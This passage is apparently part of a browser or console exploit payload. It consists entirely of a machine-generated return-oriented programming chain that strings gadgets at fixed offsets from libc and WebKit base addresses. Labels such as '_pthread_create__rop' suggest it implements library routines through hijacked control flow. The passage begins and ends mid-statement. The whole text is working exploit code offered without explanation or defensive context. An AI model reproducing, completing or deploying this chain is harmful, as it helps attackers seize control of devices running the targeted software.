[rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+145152, //L2000 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+145168, //L2001 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+568675 //pop r8 ]); //L2000: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2001: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+145288, //L2002 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+145272, //L2003 webkit_base+660161, //mov [rsi], rax 
; mov al, 1 libc_base+759608 //pop rax ]); //L2003: db([0, 0]); // 0x0 set_gadget(libc_base+782311,); //pop rsp //L2002: db([0, 0]); // 0x0 //___bswap16_var: set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+145360, //L2005 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 webkit_base+568675 //pop r8 ]); //L2005: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+145456, //L2006 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+145488, //L2009 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+763368 //pop rcx ]); //L2006: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L2008: db([16, 0]); // 0x10 set_gadget(webkit_base+568675,); //pop r8 //L2009: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+145592, //L2012 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+145576, //L2010 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2010: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2012: db([0, 0]); // 0x0 set_gadgets([ libc_base+224144, //mov ax, [rdi] libc_base+764760, //pop rsi ropchain+145752, //L2016 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+145720, //L2014 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+145736, //L2015 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2013: db([16, 0]); // 0x10 set_gadget(webkit_base+3236123,); //pop r9 
//L2014: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2015: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2016: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+145808, //L2018 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L2018: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+145936, //L2020 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+145952, //L2021 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+145920, //L2019 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2019: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L2020: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2021: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+146112, //L2025 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+146080, //L2023 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+146096, //L2024 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2022: db([48, 0]); // 0x30 set_gadget(webkit_base+3236123,); //pop r9 //L2023: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2024: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2025: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+146216, //L2027 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+146200, //L2026 
webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2026: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2027: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L2028: db([8, 0]); // 0x8 set_gadget(libc_base+763368,); //pop rcx //L2029: db([8, 0]); // 0x8 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+146424, //L2032 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+146408, //L2031 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2030: db([48, 0]); // 0x30 set_gadget(webkit_base+3236123,); //pop r9 //L2031: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2032: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+146528, //L2034 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+146512, //L2033 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2033: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2034: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+146608, //L2035 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L2035: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L2037: db([16, 0]); // 0x10 set_gadgets([ 
libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+146728, //L2040 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+146712, //L2038 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2038: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2040: db([0, 0]); // 0x0 set_gadgets([ libc_base+224144, //mov ax, [rdi] libc_base+764760, //pop rsi ropchain+146888, //L2044 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+146856, //L2042 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+146872, //L2043 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2041: db([16, 0]); // 0x10 set_gadget(webkit_base+3236123,); //pop r9 //L2042: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2043: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2044: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+146944, //L2046 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L2046: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+147072, //L2048 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+147088, //L2049 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+147056, //L2047 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2047: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L2048: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2049: db([0, 0]); // 0x0 set_gadgets([ 
webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+147248, //L2053 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+147216, //L2051 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+147232, //L2052 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2050: db([48, 0]); // 0x30 set_gadget(webkit_base+3236123,); //pop r9 //L2051: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2052: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2053: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+147352, //L2055 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+147336, //L2054 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2054: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2055: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L2056: db([8, 0]); // 0x8 set_gadget(libc_base+763368,); //pop rcx //L2057: db([8, 0]); // 0x8 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+147552, //L2060 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+147536, //L2059 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2058: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L2059: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop 
rax //L2060: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+147656, //L2062 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+147640, //L2061 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2061: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2062: db([0, 0]); // 0x0 set_gadgets([ libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+147768, //L2065 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+147752, //L2064 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2063: db([48, 0]); // 0x30 set_gadget(webkit_base+3236123,); //pop r9 //L2064: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2065: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+147832, //L2067 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+763368 //pop rcx ]); //L2067: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+147888, //L2068 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2068: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+105700, //or rax, rcx libc_base+764760, //pop rsi ropchain+148040, //L2071 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+148056, //L2072 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+148024, //L2070 
webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L2070: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2071: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2072: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+148216, //L2076 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+148184, //L2074 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+148200, //L2075 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2073: db([48, 0]); // 0x30 set_gadget(webkit_base+3236123,); //pop r9 //L2074: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2075: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2076: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+148336, //L2077 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+148368, //L2079 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+148352, //L2078 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2077: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2078: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2079: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+148472, //L2080 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+148488, //L2081 webkit_base+660161, //mov 
[rsi], rax ; mov al, 1 webkit_base+568675 //pop r8 ]); //L2080: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2081: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+148608, //L2082 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+148592, //L2083 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+759608 //pop rax ]); //L2083: db([0, 0]); // 0x0 set_gadget(libc_base+782311,); //pop rsp //L2082: db([0, 0]); // 0x0 set_gadgets([ libc_base+764760, //pop rsi ropchain+148696, //L2085 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+148680, //L2084 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L2084: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2085: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+148800, //L2086 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+148816, //L2087 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+568675 //pop r8 ]); //L2086: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2087: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+148936, //L2088 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+148920, 
//L2089 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+759608 //pop rax ]); //L2089: db([0, 0]); // 0x0 set_gadget(libc_base+782311,); //pop rsp //L2088: db([0, 0]); // 0x0 //_pthread_create__rop: set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+149008, //L2091 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 webkit_base+568675 //pop r8 ]); //L2091: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+149072, //L2093 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 webkit_base+568675 //pop r8 ]); //L2093: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([24, 0]); // 0x18 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+149176, //L2094 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+149192, //L2095 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2094: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L2095: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2096: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2097: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+149320, //L2099 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+149304, //L2098 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L2098: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2099: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov 
rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L2100: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L2101: db([1, 0]); // 0x1 set_gadget(libc_base+763368,); //pop rcx //L2102: db([1, 0]); // 0x1 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+835093, //sub rax, rcx ; sbb rdx, rcx libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L2103: db([1, 0]); // 0x1 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2105: db([4096, 0]); // 0x1000 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+149632, //L2106 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2106: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+105700, //or rax, rcx libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L2108: db([1, 0]); // 0x1 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2110: db([2, 0]); // 0x2 set_gadgets([ libc_base+225585, //mov rax, [rdi] 
libc_base+764760, //pop rsi ropchain+149824, //L2111 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2111: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+105700, //or rax, rcx libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+149936, //L2113 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L2113: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2114: db([65536, 0]); // 0x10000 set_gadget(libc_base+144605,); //pop rdi //L2115: db([65536, 0]); // 0x10000 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+150064, //L2117 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+150048, //L2116 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L2116: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2117: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L2118: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608, //pop rax //L2120: ropchain+150216, //L2119 libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+782311, //pop rsp ropchain+160336, //L2121 //L2119: libc_base+853989, //mov rax, rcx libc_base+764760 //pop rsi ]); 
db([4294967248, 4294967295]); // -0x30 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+150312, //L2123 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2123: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+150368, //L2124 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2124: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L2126: db([65536, 0]); // 0x10000 set_gadget(libc_base+763368,); //pop rcx //L2127: db([65536, 0]); // 0x10000 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+764760, //pop rsi ropchain+150520, //L2129 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2129: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+150576, //L2130 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2130: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+150648, //L2132 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L2132: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L2134: 
db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L2135: db([312, 0]); // 0x138 set_gadget(libc_base+764760,); //pop rsi //L2137: db([4294967284, 4294967295]); // -0xc set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+3488438, //mov [rax], ecx libc_base+731401, //mov rax, r8 libc_base+764760 //pop rsi ]); //L2139: db([4294967284, 4294967295]); // -0xc set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+150864, //L2142 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+150848, //L2140 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2140: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2142: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+151040, //L2145 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+151056, //L2146 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+151008, //L2143 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+151024, //L2144 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2143: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L2144: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2145: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2146: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+151152, //L2148 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi 
